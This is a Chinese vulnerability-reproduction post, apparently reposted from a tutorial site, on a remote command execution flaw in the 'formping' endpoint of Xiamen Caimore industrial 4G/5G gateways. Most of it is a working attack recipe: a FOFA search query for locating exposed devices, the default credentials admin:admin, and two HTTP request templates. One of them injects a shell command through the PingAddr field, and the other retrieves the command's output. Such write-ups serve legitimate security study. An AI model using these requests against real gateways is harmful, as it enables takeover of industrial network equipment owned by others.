前言
廈門才茂通信網(wǎng)關(guān)formping存在遠(yuǎn)程命令執(zhí)行漏洞,攻擊者可通過特定payload對目標(biāo)服務(wù)器發(fā)起攻擊,造成不可估量的影響。
聲明
請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章作者無關(guān)。該文章僅供學(xué)習(xí)用途使用。
一、漏洞描述
廈門才茂網(wǎng)關(guān),采用開放式軟件架構(gòu)設(shè)計,是一款金屬外殼設(shè)計,帶4路千兆LAN、1路千兆WAN,采用 3G/4G/5G
廣域網(wǎng)絡(luò)上網(wǎng)通信的工業(yè)級設(shè)計無線網(wǎng)關(guān),支持2.4GWiFi
和5.8GWiFi
廈門才茂網(wǎng)關(guān)系統(tǒng)formping存在命令執(zhí)行漏洞,攻擊者通過漏洞可以執(zhí)行任意命令,導(dǎo)致服務(wù)器失陷。
二、漏洞復(fù)現(xiàn)
FOFA:app=" CAIMORE-Gateway"
弱口令 admin:admin 登錄,通過漏洞執(zhí)行l(wèi)inux命令,在通過訪問指定參數(shù)得到回顯
Payload如下:文章來源:http://www.zghlxwxcb.cn/news/detail-612020.html
POC1:
POST /goform/formping HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 63
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip
PingAddr=127.0.0.1%7Cecho%20hellocaimao&PingPackNumb=1&PingMsg=
POC2:
GET /pingmessages HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip
訪問應(yīng)用會出現(xiàn)彈窗認(rèn)證(401)機(jī)制,輸入 admin:admin 登錄
POC驗證如下:文章來源地址http://www.zghlxwxcb.cn/news/detail-612020.html
到了這里,關(guān)于【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!